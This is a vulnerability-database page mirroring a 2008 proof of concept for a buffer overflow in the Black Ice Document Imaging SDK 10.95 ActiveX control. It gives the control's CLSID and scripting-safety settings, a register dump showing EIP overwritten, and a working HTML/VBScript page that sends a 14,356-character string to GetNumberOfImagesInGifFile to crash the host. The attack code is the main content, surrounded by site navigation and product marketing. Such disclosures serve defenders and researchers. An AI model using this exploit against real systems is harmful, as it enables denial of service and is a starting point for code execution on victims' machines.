Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

🗓️ 16 Jul 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 29 Views

Document Imaging SDK 10.95 ActiveX Buffer Overflow Vulnerabilit

Code

                                                <!--
Document Imaging SDK Buffer Overflow Vulnerability

               DoS Proof of concept

Author: r0ut3r
Mail  : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2

Version: 10.95


Vendor : Black Ice Software

Price  : $999

File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings: 
RegKey Safe for Script: True
RegKey Safe for Init  : True
KillBitSet            : False

Register: 



EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141



ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>



<script language='vbscript'>
 Sub Boom
    buff = String(14356, "A")
    test.GetNumberOfImagesInGifFile buff

 End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1
black ice softwarebuffer overflowactivexvulnerabilitydocument imaging sdkdos proof of conceptwinxp pro sp2biimgfrm.ocxclsidr0ut3r
29